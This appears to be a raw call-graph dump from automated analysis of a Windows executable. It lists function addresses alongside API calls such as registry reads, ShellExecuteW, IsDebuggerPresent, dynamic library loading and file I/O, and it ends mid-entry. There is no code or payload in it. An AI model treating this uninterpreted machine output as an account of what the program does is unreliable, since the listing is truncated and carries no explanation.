84266->84272 84268 40bd37 84267->84268 84288 4531b1 85 API calls 5 library calls 84267->84288 84277 40bd50 84268->84277 84287 45e987 86 API calls moneypunct 84271->84287 84286 40b510 VariantClear 84272->84286 84276 4281ba 84278 426cf1 84277->84278 84279 40bd63 84277->84279 84298 44cde9 52 API calls _memmove 84278->84298 84289 40bd80 84279->84289 84282 40bd73 84282->84269 84283 426cfc 84299 40e0a0 52 API calls 84283->84299 84285 426d02 84286->84276 84287->84267 84288->84268 84290 40bd8e 84289->84290 84294 40bdb7 _memmove 84289->84294 84291 40bded 84290->84291 84292 40bdad 84290->84292 84290->84294 84295 4115d7 52 API calls 84291->84295 84300 402f00 84292->84300 84294->84282 84296 40bdf6 84295->84296 84296->84294 84297 4115d7 52 API calls 84296->84297 84297->84294 84298->84283 84299->84285 84301 402f10 84300->84301 84302 402f0c 84300->84302 84303 4115d7 52 API calls 84301->84303 84304 4268c3 84301->84304 84302->84294 84305 402f51 moneypunct _memmove 84303->84305 84305->84294 84306 425ba2 84311 40e360 84306->84311 84308 425bb4 84327 41130a 51 API calls __cinit 84308->84327 84310 425bbe 84312 4115d7 52 API calls 84311->84312 84313 40e3ec GetModuleFileNameW 84312->84313 84328 413a0e 84313->84328 84315 40e421 _wcsncat 84331 413a9e 84315->84331 84318 4115d7 52 API calls 84319 40e45e _wcscpy 84318->84319 84334 40bc70 84319->84334 84323 40e4a9 84323->84308 84324 4115d7 52 API calls 84325 40e4a1 _wcscat _wcslen _wcsncpy 84324->84325 84325->84323 84325->84324 84326 401c90 52 API calls 84325->84326 84326->84325 84327->84310 84353 413801 84328->84353 84383 419efd 84331->84383 84335 4115d7 52 API calls 84334->84335 84336 40bc98 84335->84336 84337 4115d7 52 API calls 84336->84337 84338 40bca6 84337->84338 84339 40e4c0 84338->84339 84395 403350 84339->84395 84341 40e4cb RegOpenKeyExW 84342 427190 RegQueryValueExW 84341->84342 84343 40e4eb 84341->84343 84344 4271b0 84342->84344 84345 42721a RegCloseKey 84342->84345 84343->84325 84346 4115d7 52 API calls 84344->84346 84345->84325 84347 4271cb 84346->84347 84402 43652f 52 API calls 84347->84402 84349 4271d8 RegQueryValueExW 84350 4271f7 84349->84350 84352 42720e 84349->84352 84351 402160 52 API calls 84350->84351 84351->84352 84352->84345 84354 41381a 84353->84354 84355 41389e 84353->84355 84354->84355 84368 41388a 84354->84368 84375 419e30 46 API calls ___wstrgtold12_l 84354->84375 84356 4139e8 84355->84356 84358 413a00 84355->84358 84380 417f77 46 API calls __getptd_noexit 84356->84380 84382 417f77 46 API calls __getptd_noexit 84358->84382 84359 4139ed 84381 417f25 10 API calls ___wstrgtold12_l 84359->84381 84363 41396c 84363->84355 84364 413967 84363->84364 84366 41397a 84363->84366 84364->84315 84365 413929 84365->84355 84367 413945 84365->84367 84377 419e30 46 API calls ___wstrgtold12_l 84365->84377 84379 419e30 46 API calls ___wstrgtold12_l 84366->84379 84367->84355 84367->84364 84371 41395b 84367->84371 84368->84355 84374 413909 84368->84374 84376 419e30 46 API calls ___wstrgtold12_l 84368->84376 84378 419e30 46 API calls ___wstrgtold12_l 84371->84378 84374->84363 84374->84365 84375->84368 84376->84374 84377->84367 84378->84364 84379->84364 84380->84359 84381->84364 84382->84364 84384 419f13 84383->84384 84385 419f0e 84383->84385 84392 417f77 46 API calls __getptd_noexit 84384->84392 84385->84384 84390 419f2b 84385->84390 84387 419f18 84393 417f25 10 API calls ___wstrgtold12_l 84387->84393 84389 40e454 84389->84318 84390->84389 84394 417f77 46 API calls __getptd_noexit 84390->84394 84392->84387 84393->84389 84394->84387 84396 403367 84395->84396 84397 403358 84395->84397 84398 4115d7 52 API calls 84396->84398 84397->84341 84399 403370 84398->84399 84400 4115d7 52 API calls 84399->84400 84401 40339e 84400->84401 84401->84341 84402->84349 84403 413d7f0 84417 413b440 84403->84417 84405 413d8a7 84420 413d6e0 84405->84420 84419 413bacb 84417->84419 84423 413e8d0 GetPEB 84417->84423 84419->84405 84421 413d6e9 Sleep 84420->84421 84422 413d6f7 84421->84422 84423->84419 84424 416454 84461 416c70 84424->84461 84426 416460 GetStartupInfoW 84427 416474 84426->84427 84462 419d5a HeapCreate 84427->84462 84429 4164cd 84430 4164d8 84429->84430 84546 41642b 46 API calls 3 library calls 84429->84546 84463 417c20 GetModuleHandleW 84430->84463 84433 4164de 84434 4164e9 __RTC_Initialize 84433->84434 84547 41642b 46 API calls 3 library calls 84433->84547 84482 41aaa1 GetStartupInfoW 84434->84482 84438 416503 GetCommandLineW 84495 41f584 GetEnvironmentStringsW 84438->84495 84442 416513 84501 41f4d6 GetModuleFileNameW 84442->84501 84444 41651d 84445 416528 84444->84445 84549 411924 46 API calls 3 library calls 84444->84549 84505 41f2a4 84445->84505 84448 41652e 84449 416539 84448->84449 84550 411924 46 API calls 3 library calls 84448->84550 84519 411703 84449->84519 84452 416541 84454 41654c __wwincmdln 84452->84454 84551 411924 46 API calls 3 library calls 84452->84551 84523 40d6b0 84454->84523 84457 41657c 84553 411906 46 API calls _doexit 84457->84553 84460 416581 __alloc_osfhnd 84461->84426 84462->84429 84464 417c34 84463->84464 84465 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84463->84465 84554 4178ff 49 API calls _free 84464->84554 84467 417c87 TlsAlloc 84465->84467 84470 417cd5 TlsSetValue 84467->84470 84471 417d96 84467->84471 84468 417c39 84468->84433 84470->84471 84472 417ce6 __init_pointers 84470->84472 84471->84433 84555 418151 InitializeCriticalSectionAndSpinCount 84472->84555 84474 417d91 84563 4178ff 49 API calls _free 84474->84563 84476 417d2a 84476->84474 84556 416b49 84476->84556 84479 417d76 84562 41793c 46 API calls 4 library calls 84479->84562 84481 417d7e GetCurrentThreadId 84481->84471 84483 416b49 __calloc_crt 46 API calls 84482->84483 84489 41aabf 84483->84489 84484 41ac6a GetStdHandle 84490 41ac34 84484->84490 84485 41acce SetHandleCount 84494 4164f7 84485->84494 84486 416b49 __calloc_crt 46 API calls 84486->84489 84487 41ac7c GetFileType 84487->84490 84488 41abb4 84488->84490 84491 41abe0 GetFileType 84488->84491 84492 41abeb InitializeCriticalSectionAndSpinCount 84488->84492 84489->84486 84489->84488 84489->84490 84489->84494 84490->84484 84490->84485 84490->84487 84493 41aca2 InitializeCriticalSectionAndSpinCount 84490->84493 84491->84488 84491->84492 84492->84488 84492->84494 84493->84490 84493->84494 84494->84438 84548 411924 46 API calls 3 library calls 84494->84548 84496 41f595 84495->84496 84497 41f599 84495->84497 84496->84442 84573 416b04 84497->84573 84499 41f5c2 FreeEnvironmentStringsW 84499->84442 84500 41f5bb _memmove 84500->84499 84502 41f50b _wparse_cmdline 84501->84502 84503 416b04 __malloc_crt 46 API calls 84502->84503 84504 41f54e _wparse_cmdline 84502->84504 84503->84504 84504->84444 84506 41f2bc _wcslen 84505->84506 84508 41f2b4 84505->84508 84507 416b49 __calloc_crt 46 API calls 84506->84507 84511 41f2e0 _wcslen 84507->84511 84508->84448 84509 41f336 84580 413748 84509->84580 84511->84508 84511->84509 84512 416b49 __calloc_crt 46 API calls 84511->84512 84513 41f35c 84511->84513 84516 41f373 84511->84516 84579 41ef12 46 API calls ___wstrgtold12_l 84511->84579 84512->84511 84514 413748 _free 46 API calls 84513->84514 84514->84508 84586 417ed3 84516->84586 84518 41f37f 84518->84448 84520 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84519->84520 84522 411750 __IsNonwritableInCurrentImage 84520->84522 84605 41130a 51 API calls __cinit 84520->84605 84522->84452 84524 42e2f3 84523->84524 84525 40d6cc 84523->84525 84606 408f40 84525->84606 84527 40d707 84610 40ebb0 84527->84610 84530 40d737 84613 411951 84530->84613 84535 40d751 84625 40f4e0 SystemParametersInfoW SystemParametersInfoW 84535->84625 84537 40d75f 84626 40d590 GetCurrentDirectoryW 84537->84626 84539 40d767 SystemParametersInfoW 84540 40d794 84539->84540 84541 40d78d FreeLibrary 84539->84541 84542 408f40 VariantClear 84540->84542 84541->84540 84543 40d79d 84542->84543 84544 408f40 VariantClear 84543->84544 84545 40d7a6 84544->84545 84545->84457 84552 4118da 46 API calls _doexit 84545->84552 84546->84430 84547->84434 84552->84457 84553->84460 84554->84468 84555->84476 84558 416b52 84556->84558 84559 416b8f 84558->84559 84560 416b70 Sleep 84558->84560 84564 41f677 84558->84564 84559->84474 84559->84479 84561 416b85 84560->84561 84561->84558 84561->84559 84562->84481 84563->84471 84565 41f683 84564->84565 84570 41f69e _malloc 84564->84570 84566 41f68f 84565->84566 84565->84570 84572 417f77 46 API calls __getptd_noexit 84566->84572 84568 41f6b1 HeapAlloc 84569 41f6d8 84568->84569 84568->84570 84569->84558 84570->84568 84570->84569 84571 41f694 84571->84558 84572->84571 84575 416b0d 84573->84575 84574 4135bb _malloc 45 API calls 84574->84575 84575->84574 84576 416b43 84575->84576 84577 416b24 Sleep 84575->84577 84576->84500 84578 416b39 84577->84578 84578->84575 84578->84576 84579->84511 84581 41377c _free 84580->84581 84582 413753 RtlFreeHeap 84580->84582 84581->84508 84582->84581 84583 413768 84582->84583 84589 417f77 46 API calls __getptd_noexit 84583->84589 84585 41376e GetLastError 84585->84581 84590 417daa 84586->84590 84589->84585 84591 417dc9 __recalloc __call_reportfault 84590->84591 84592 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84591->84592 84593 417eb5 __call_reportfault 84592->84593 84596 41a208 84593->84596 84595 417ed1 GetCurrentProcess TerminateProcess 84595->84518 84597 41a210 84596->84597 84598 41a212 IsDebuggerPresent 84596->84598 84597->84595 84604 41fe19 84598->84604 84601 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84602 421ff0 __call_reportfault 84601->84602 84603 421ff8 GetCurrentProcess TerminateProcess 84601->84603 84602->84603 84603->84595 84604->84601 84605->84522 84609 408f48 moneypunct 84606->84609 84607 4265c7 VariantClear 84608 408f55 moneypunct 84607->84608 84608->84527 84609->84607 84609->84608 84666 40ebd0 84610->84666 84670 4182cb 84613->84670 84615 41195e 84677 4181f2 LeaveCriticalSection 84615->84677 84617 40d748 84618 4119b0 84617->84618 84619 4119d6 84618->84619 84620 4119bc 84618->84620 84619->84535 84620->84619 84712 417f77 46 API calls __getptd_noexit 84620->84712 84622 4119c6 84713 417f25 10 API calls ___wstrgtold12_l 84622->84713 84624 4119d1 84624->84535 84625->84537 84714 401f20 84626->84714 84628 40d5b6 IsDebuggerPresent 84629 40d5c4 84628->84629 84630 42e1bb MessageBoxA 84628->84630 84631 42e1d4 84629->84631 84632 40d5e3 84629->84632 84630->84631 84887 403a50 52 API calls 3 library calls 84631->84887 84784 40f520 84632->84784 84636 40d5fd GetFullPathNameW 84796 401460 84636->84796 84638 40d63b 84639 40d643 84638->84639 84640 42e231 SetCurrentDirectoryW 84638->84640 84641 40d64c 84639->84641 84888 432fee 6 API calls 84639->84888 84640->84639 84811 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84641->84811 84644 42e252 84644->84641 84646 42e25a GetModuleFileNameW 84644->84646 84648 42e274 84646->84648 84649 42e2cb GetForegroundWindow ShellExecuteW 84646->84649 84889 401b10 84648->84889 84651 40d688 84649->84651 84650 40d656 84653 40d669 84650->84653 84885 40e0c0 74 API calls __recalloc 84650->84885 84658 40d692 SetCurrentDirectoryW 84651->84658 84819 4091e0 84653->84819 84658->84539 84660 42e28d 84896 40d200 52 API calls 2 library calls 84660->84896 84663 42e299 GetForegroundWindow ShellExecuteW 84664 42e2c6 84663->84664 84664->84651 84665 40ec00 LoadLibraryA GetProcAddress 84665->84530 84667 40d72e 84666->84667 84668 40ebd6 LoadLibraryA 84666->84668 84667->84530 84667->84665 84668->84667 84669 40ebe7 GetProcAddress 84668->84669 84669->84667 84671 4182e0 84670->84671 84672 4182f3 EnterCriticalSection 84670->84672 84678 418209 84671->84678 84672->84615 84674 4182e6 84674->84672 84705 411924 46 API calls 3 library calls 84674->84705 84677->84617 84679 418215 __alloc_osfhnd 84678->84679 84680 418225 84679->84680 84681 41823d 84679->84681 84706 418901 46 API calls __NMSG_WRITE 84680->84706 84683 416b04 __malloc_crt 45 API calls 84681->84683 84689 41824b __alloc_osfhnd 84681->84689 84685 418256 84683->84685 84684 41822a 84707 418752 46 API calls 8 library calls 84684->84707 84687 41825d 84685->84687 84688 41826c 84685->84688 84709 417f77 46 API calls __getptd_noexit 84687->84709 84692 4182cb __lock 45 API calls 84688->84692 84689->84674 84690 418231 84708 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84690->84708 84694 418273 84692->84694 84696 4182a6 84694->84696 84697 41827b InitializeCriticalSectionAndSpinCount 84694->84697 84698 413748 _free 45 API calls 84696->84698 84699 418297 84697->84699 84700 41828b 84697->84700 84698->84699 84711 4182c2 LeaveCriticalSection _doexit 84699->84711 84701 413748 _free 45 API calls 84700->84701 84703 418291 84701->84703 84710 417f77 46 API calls __getptd_noexit 84703->84710 84706->84684 84707->84690 84709->84689 84710->84699 84711->84689 84712->84622 84713->84624 84897 40e6e0 84714->84897 84718 401f41 GetModuleFileNameW 84915 410100 84718->84915 84720 401f5c 84927 410960 84720->84927 84723 401b10 52 API calls 84724 401f81 84723->84724 84930 401980 84724->84930 84726 401f8e 84727 408f40 VariantClear 84726->84727 84728 401f9d 84727->84728 84729 401b10 52 API calls 84728->84729 84730 401fb4 84729->84730 84731 401980 53 API calls 84730->84731 84732 401fc3 84731->84732 84733 401b10 52 API calls 84732->84733 84734 401fd2 84733->84734 84938 40c2c0 84734->84938 84736 401fe1 84737 40bc70 52 API calls 84736->84737 84738 401ff3 84737->84738 84956 401a10 84738->84956 84740 401ffe 84963 4114ab 84740->84963 84743 428b05 84745 401a10 52 API calls 84743->84745 84744 402017 84746 4114ab __wcsicoll 58 API calls 84744->84746 84747 428b18 84745->84747 84748 402022 84746->84748 84750 401a10 52 API calls 84747->84750 84748->84747 84749 40202d 84748->84749 84751 4114ab __wcsicoll 58 API calls 84749->84751 84752 428b33 84750->84752 84753 402038 84751->84753 84755 428b3b GetModuleFileNameW 84752->84755 84754 402043 84753->84754 84753->84755 84756 4114ab __wcsicoll 58 API calls 84754->84756 84757 401a10 52 API calls 84755->84757 84759 40204e 84756->84759 84758 428b6c 84757->84758 84975 40e0a0 52 API calls 84758->84975 84760 402092 84759->84760 84764 401a10 52 API calls 84759->84764 84769 428b90 _wcscpy 84759->84769 84763 4020a3 84760->84763 84760->84769 84762 428b7a 84765 401a10 52 API calls 84762->84765 84766 428bc6 84763->84766 84971 40e830 53 API calls 84763->84971 84767 402073 _wcscpy 84764->84767 84768 428b88 84765->84768 84774 401a10 52 API calls 84767->84774 84768->84769 84771 401a10 52 API calls 84769->84771 84779 4020d0 84771->84779 84772 4020bb 84972 40cf00 53 API calls 84772->84972 84774->84760 84775 4020c6 84776 408f40 VariantClear 84775->84776 84776->84779 84777 402110 84781 408f40 VariantClear 84777->84781 84779->84777 84782 401a10 52 API calls 84779->84782 84973 40cf00 53 API calls 84779->84973 84974 40e6a0 53 API calls 84779->84974 84783 402120 moneypunct 84781->84783 84782->84779 84783->84628 84785 4295c9 __recalloc 84784->84785 84786 40f53c 84784->84786 84788 4295d9 GetOpenFileNameW 84785->84788 85651 410120 84786->85651 84788->84786 84790 40d5f5 84788->84790 84789 40f545 85655 4102b0 SHGetMalloc 84789->85655 84790->84636 84790->84638 84792 40f54c 85660 410190 GetFullPathNameW 84792->85660 84794 40f559 85671 40f570 84794->85671 85733 402400 84796->85733 84798 40146f 84801 428c29 _wcscat 84798->84801 85742 401500 84798->85742 84800 40147c 84800->84801 85750 40d440 84800->85750 84803 401489 84803->84801 84804 401491 GetFullPathNameW 84803->84804 84805 402160 52 API calls 84804->84805 84806 4014bb 84805->84806 84807 402160 52 API calls 84806->84807 84808 4014c8 84807->84808 84808->84801 84809 402160 52 API calls 84808->84809 84810 4014ee 84809->84810 84810->84638 84812 428361 84811->84812 84813 4103fc LoadImageW RegisterClassExW 84811->84813 85822 44395e EnumResourceNamesW LoadImageW 84812->85822 85821 410490 7 API calls 84813->85821 84816 40d651 84818 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84816->84818 84817 428368 84818->84650 84820 409202 84819->84820 84821 42d7ad 84819->84821 84866 409216 moneypunct 84820->84866 86094 410940 337 API calls 84820->86094 86097 45e737 90 API calls 3 library calls 84821->86097 84824 409386 84825 40939c 84824->84825 86095 40f190 10 API calls 84824->86095 84825->84651 84886 401000 Shell_NotifyIconW __recalloc 84825->84886 84827 4095b2 84827->84825 84828 4095bf 84827->84828 86096 401a50 337 API calls 84828->86096 84829 409253 PeekMessageW 84829->84866 84831 42d8cd Sleep 84831->84866 84832 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84832->84825 84835 4095f9 84832->84835 84834 42e13b 86116 40d410 VariantClear 84834->86116 84837 42e158 TranslateMessage DispatchMessageW GetMessageW 84835->84837 84837->84837 84840 42e188 84837->84840 84839 409567 PeekMessageW 84839->84866 84840->84825 84843 44c29d 52 API calls 84862 4094e0 84843->84862 84844 46f3c1 107 API calls 84844->84866 84846 46fdbf 108 API calls 84846->84862 84847 409551 TranslateMessage DispatchMessageW 84847->84839 84849 42dcd2 WaitForSingleObject 84850 42dcf0 GetExitCodeProcess CloseHandle 84849->84850 84849->84866 86105 40d410 VariantClear 84850->86105 84852 42dd3d Sleep 84852->84862 84853 47d33e 315 API calls 84853->84866 84856 4094cf Sleep 84856->84862 84857 408f40 VariantClear 84857->84862 84859 42d94d timeGetTime 86101 465124 53 API calls 84859->86101 84861 40d410 VariantClear 84861->84866 84862->84843 84862->84846 84862->84857 84863 40c620 timeGetTime 84862->84863 84862->84866 84867 42dd89 CloseHandle 84862->84867 84869 465124 53 API calls 84862->84869 84870 42de19 GetExitCodeProcess CloseHandle 84862->84870 84872 401b10 52 API calls 84862->84872 84875 42de88 Sleep 84862->84875 84883 401980 53 API calls 84862->84883 86102 45178a 54 API calls 84862->86102 86103 47d33e 337 API calls 84862->86103 86104 453bc6 54 API calls 84862->86104 86106 40d410 VariantClear 84862->86106 86107 443d19 67 API calls _wcslen 84862->86107 86108 4574b4 VariantClear 84862->86108 86109 403cd0 84862->86109 86113 4731e1 VariantClear 84862->86113 86114 4331a2 6 API calls 84862->86114 84863->84862 84866->84824 84866->84829 84866->84831 84866->84834 84866->84839 84866->84844 84866->84847 84866->84849 84866->84852 84866->84853 84866->84856 84866->84859 84866->84861 84866->84862 84877 45e737 90 API calls 84866->84877 84880 42e0cc VariantClear 84866->84880 84881 408f40 VariantClear 84866->84881 85823 4091b0 84866->85823 85881 40afa0 84866->85881 85907 408fc0 84866->85907 85942 408cc0 84866->85942 85956 40d150 84866->85956 85961 40d170 84866->85961 85967 4096a0 84866->85967 86098 465124 53 API calls 84866->86098 86099 40e0a0 52 API calls 84866->86099 86100 40c620 timeGetTime 84866->86100 86115 40e270 VariantClear moneypunct 84866->86115 84867->84862 84869->84862 84870->84862 84872->84862 84875->84866 84877->84866 84880->84866 84881->84866 84883->84862 84885->84653 84886->84651 84887->84638 84888->84644 84890 401b16 _wcslen 84889->84890 84891 4115d7 52 API calls 84890->84891 84894 401b63 84890->84894 84892 401b4b _memmove 84891->84892 84893 4115d7 52 API calls 84892->84893 84893->84894 84895 40d200 52 API calls 2 library calls 84894->84895 84895->84660 84896->84663 84898 40bc70 52 API calls 84897->84898 84899 401f31 84898->84899 84900 402560 84899->84900 84901 40256d __write_nolock 84900->84901 84902 402160 52 API calls 84901->84902 84904 402593 84902->84904 84914 4025bd 84904->84914 84976 401c90 84904->84976 84905 4026f0 52 API calls 84905->84914 84906 4026a7 84907 401b10 52 API calls 84906->84907 84913 4026db 84906->84913 84909 4026d1 84907->84909 84908 401b10 52 API calls 84908->84914 84980 40d7c0 52 API calls 2 library calls 84909->84980 84910 401c90 52 API calls 84910->84914 84913->84718 84914->84905 84914->84906 84914->84908 84914->84910 84979 40d7c0 52 API calls 2 library calls 84914->84979 84981 40f760 84915->84981 84918 410118 84918->84720 84920 42805d 84921 42806a 84920->84921 85037 431e58 84920->85037 84923 413748 _free 46 API calls 84921->84923 84924 428078 84923->84924 84925 431e58 82 API calls 84924->84925 84926 428084 84925->84926 84926->84720 84928 4115d7 52 API calls 84927->84928 84929 401f74 84928->84929 84929->84723 84931 4019a3 84930->84931 84932 401985 84930->84932 84931->84932 84933 4019b8 84931->84933 84935 40199f 84932->84935 85639 403e10 53 API calls 84932->85639 85640 403e10 53 API calls 84933->85640 84935->84726 84937 4019c4 84937->84726 84939 40c2c7 84938->84939 84940 40c30e 84938->84940 84943 40c2d3 84939->84943 84944 426c79 84939->84944 84941 40c315 84940->84941 84942 426c2b 84940->84942 84945 40c321 84941->84945 84946 426c5a 84941->84946 84948 426c4b 84942->84948 84949 426c2e 84942->84949 85641 403ea0 52 API calls __cinit 84943->85641 85646 4534e3 52 API calls 84944->85646 85642 403ea0 52 API calls __cinit 84945->85642 85645 4534e3 52 API calls 84946->85645 85644 4534e3 52 API calls 84948->85644 84955 40c2de 84949->84955 85643 4534e3 52 API calls 84949->85643 84955->84736 84955->84955 84957 401a30 84956->84957 84958 401a17 84956->84958 84960 402160 52 API calls 84957->84960 84959 401a2d 84958->84959 85647 403c30 52 API calls _memmove 84958->85647 84959->84740 84962 401a3d 84960->84962 84962->84740 84964 411523 84963->84964 84965 4114ba 84963->84965 85650 4113a8 58 API calls 3 library calls 84964->85650 84968 40200c 84965->84968 85648 417f77 46 API calls __getptd_noexit 84965->85648 84968->84743 84968->84744 84969 4114c6 85649 417f25 10 API calls ___wstrgtold12_l 84969->85649 84971->84772 84972->84775 84973->84779 84974->84779 84975->84762 84977 4026f0 52 API calls 84976->84977 84978 401c97 84977->84978 84978->84904 84979->84914 84980->84913 85041 40f6f0 84981->85041 84983 40f77b _strcat moneypunct 85049 40f850 84983->85049 84988 427c2a 85078 414d04 84988->85078 84990 40f7fc 84990->84988 84992 40f804 84990->84992 85065 414a46 84992->85065 84995 40f80e 84995->84918 85000 4528bd 84995->85000 84997 427c59 85084 414fe2 84997->85084 84999 427c79 85001 4150d1 _fseek 81 API calls 85000->85001 85002 452930 85001->85002 85581 452719 85002->85581 85005 452948 85005->84920 85006 414d04 __fread_nolock 61 API calls 85007 452966 85006->85007 85008 414d04 __fread_nolock 61 API calls 85007->85008 85009 452976 85008->85009 85010 414d04 __fread_nolock 61 API calls 85009->85010 85011 45298f 85010->85011 85012 414d04 __fread_nolock 61 API calls 85011->85012 85013 4529aa 85012->85013 85014 4150d1 _fseek 81 API calls 85013->85014 85015 4529c4 85014->85015 85016 4135bb _malloc 46 API calls 85015->85016 85017 4529cf 85016->85017 85018 4135bb _malloc 46 API calls 85017->85018 85019 4529db 85018->85019 85020 414d04 __fread_nolock 61 API calls 85019->85020 85021 4529ec 85020->85021 85022 44afef GetSystemTimeAsFileTime 85021->85022 85023 452a00 85022->85023 85024 452a36 85023->85024 85025 452a13 85023->85025 85027 452aa5 85024->85027 85028 452a3c 85024->85028 85026 413748 _free 46 API calls 85025->85026 85030 452a1c 85026->85030 85029 413748 _free 46 API calls 85027->85029 85587 44b1a9 85028->85587 85032 452aa3 85029->85032 85033 413748 _free 46 API calls 85030->85033 85032->84920 85035 452a25 85033->85035 85034 452a9d 85036 413748 _free 46 API calls 85034->85036 85035->84920 85036->85032 85038 431e64 85037->85038 85039 431e6a 85037->85039 85040 414a46 __fcloseall 82 API calls 85038->85040 85039->84921 85040->85039 85042 425de2 85041->85042 85043 40f6fc _wcslen 85041->85043 85042->84983 85044 40f710 WideCharToMultiByte 85043->85044 85045 40f756 85044->85045 85046 40f728 85044->85046 85045->84983 85047 4115d7 52 API calls 85046->85047 85048 40f735 WideCharToMultiByte 85047->85048 85048->84983 85051 40f85d __recalloc _strlen 85049->85051 85052 40f7ab 85051->85052 85097 414db8 85051->85097 85053 4149c2 85052->85053 85109 414904 85053->85109 85055 40f7e9 85055->84988 85056 40f5c0 85055->85056 85061 40f5cd _strcat __write_nolock _memmove 85056->85061 85057 414d04 __fread_nolock 61 API calls 85057->85061 85059 425d11 85060 4150d1 _fseek 81 API calls 85059->85060 85062 425d33 85060->85062 85061->85057 85061->85059 85064 40f691 __tzset_nolock 85061->85064 85197 4150d1 85061->85197 85063 414d04 __fread_nolock 61 API calls 85062->85063 85063->85064 85064->84990 85066 414a52 __alloc_osfhnd 85065->85066 85067 414a64 85066->85067 85068 414a79 85066->85068 85337 417f77 46 API calls __getptd_noexit 85067->85337 85071 415471 __lock_file 47 API calls 85068->85071 85075 414a74 __alloc_osfhnd 85068->85075 85070 414a69 85338 417f25 10 API calls ___wstrgtold12_l 85070->85338 85073 414a92 85071->85073 85321 4149d9 85073->85321 85075->84995 85406 414c76 85078->85406 85080 414d1c 85081 44afef 85080->85081 85574 442c5a 85081->85574 85083 44b00d 85083->84997 85085 414fee __alloc_osfhnd 85084->85085 85086 414ffa 85085->85086 85087 41500f 85085->85087 85578 417f77 46 API calls __getptd_noexit 85086->85578 85089 415471 __lock_file 47 API calls 85087->85089 85091 415017 85089->85091 85090 414fff 85579 417f25 10 API calls ___wstrgtold12_l 85090->85579 85093 414e4e __ftell_nolock 51 API calls 85091->85093 85094 415024 85093->85094 85580 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 85094->85580 85096 41500a __alloc_osfhnd 85096->84999 85098 414dd6 85097->85098 85099 414deb 85097->85099 85106 417f77 46 API calls __getptd_noexit 85098->85106 85099->85098 85102 414df2 85099->85102 85101 414ddb 85107 417f25 10 API calls ___wstrgtold12_l 85101->85107 85104 414de6 85102->85104 85108 418f98 77 API calls 7 library calls 85102->85108 85104->85051 85106->85101 85107->85104 85108->85104 85111 414910 __alloc_osfhnd 85109->85111 85110 414923 85165 417f77 46 API calls __getptd_noexit 85110->85165 85111->85110 85114 414951 85111->85114 85113 414928 85166 417f25 10 API calls ___wstrgtold12_l 85113->85166 85128 41d4d1 85114->85128 85117 414956 85118 41496a 85117->85118 85119 41495d 85117->85119 85121 414992 85118->85121 85122 414972 85118->85122 85167 417f77 46 API calls __getptd_noexit 85119->85167 85145 41d218 85121->85145 85168 417f77 46 API calls __getptd_noexit 85122->85168 85124 414933 __alloc_osfhnd @_EH4_CallFilterFunc@8 85124->85055 85129 41d4dd __alloc_osfhnd 85128->85129 85130 4182cb __lock 46 API calls 85129->85130 85142 41d4eb 85130->85142 85131 41d560 85170 41d5fb 85131->85170 85132 41d567 85134 416b04 __malloc_crt 46 API calls 85132->85134 85136 41d56e 85134->85136 85135 41d5f0 __alloc_osfhnd 85135->85117 85136->85131 85137 41d57c InitializeCriticalSectionAndSpinCount 85136->85137 85140 41d59c 85137->85140 85141 41d5af EnterCriticalSection 85137->85141 85138 418209 __mtinitlocknum 46 API calls 85138->85142 85143 413748 _free 46 API calls 85140->85143 85141->85131 85142->85131 85142->85132 85142->85138 85173 4154b2 47 API calls __lock 85142->85173 85174 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85142->85174 85143->85131 85146 41d23a 85145->85146 85147 41d255 85146->85147 85159 41d26c __wopenfile 85146->85159 85179 417f77 46 API calls __getptd_noexit 85147->85179 85149 41d421 85152 41d47a 85149->85152 85153 41d48c 85149->85153 85150 41d25a 85180 417f25 10 API calls ___wstrgtold12_l 85150->85180 85184 417f77 46 API calls __getptd_noexit 85152->85184 85176 422bf9 85153->85176 85156 41499d 85169 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 85156->85169 85157 41d47f 85185 417f25 10 API calls ___wstrgtold12_l 85157->85185 85159->85149 85159->85152 85159->85159 85181 41341f 58 API calls 2 library calls 85159->85181 85161 41d41a 85161->85149 85182 41341f 58 API calls 2 library calls 85161->85182 85163 41d439 85163->85149 85183 41341f 58 API calls 2 library calls 85163->85183 85165->85113 85166->85124 85167->85124 85168->85124 85169->85124 85175 4181f2 LeaveCriticalSection 85170->85175 85172 41d602 85172->85135 85173->85142 85174->85142 85175->85172 85186 422b35 85176->85186 85178 422c14 85178->85156 85179->85150 85180->85156 85181->85161 85182->85163 85183->85149 85184->85157 85185->85156 85189 422b41 __alloc_osfhnd 85186->85189 85187 422b54 85188 417f77 ___wstrgtold12_l 46 API calls 85187->85188 85190 422b59 85188->85190 85189->85187 85191 422b8a 85189->85191 85192 417f25 ___wstrgtold12_l 10 API calls 85190->85192 85193 422400 __tsopen_nolock 109 API calls 85191->85193 85196 422b63 __alloc_osfhnd 85192->85196 85194 422ba4 85193->85194 85195 422bcb __wsopen_helper LeaveCriticalSection 85194->85195 85195->85196 85196->85178 85199 4150dd __alloc_osfhnd 85197->85199 85198 4150e9 85228 417f77 46 API calls __getptd_noexit 85198->85228 85199->85198 85200 41510f 85199->85200 85210 415471 85200->85210 85202 4150ee 85229 417f25 10 API calls ___wstrgtold12_l 85202->85229 85207 4150f9 __alloc_osfhnd 85207->85061 85211 415483 85210->85211 85212 4154a5 EnterCriticalSection 85210->85212 85211->85212 85214 41548b 85211->85214 85213 415117 85212->85213 85216 415047 85213->85216 85215 4182cb __lock 46 API calls 85214->85215 85215->85213 85217 415067 85216->85217 85218 415057 85216->85218 85220 415079 85217->85220 85231 414e4e 85217->85231 85286 417f77 46 API calls __getptd_noexit 85218->85286 85248 41443c 85220->85248 85221 41505c 85230 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 85221->85230 85226 4150b9 85261 41e1f4 85226->85261 85228->85202 85229->85207 85230->85207 85232 414e61 85231->85232 85233 414e79 85231->85233 85287 417f77 46 API calls __getptd_noexit 85232->85287 85235 414139 __fseek_nolock 46 API calls 85233->85235 85237 414e80 85235->85237 85236 414e66 85288 417f25 10 API calls ___wstrgtold12_l 85236->85288 85239 41e1f4 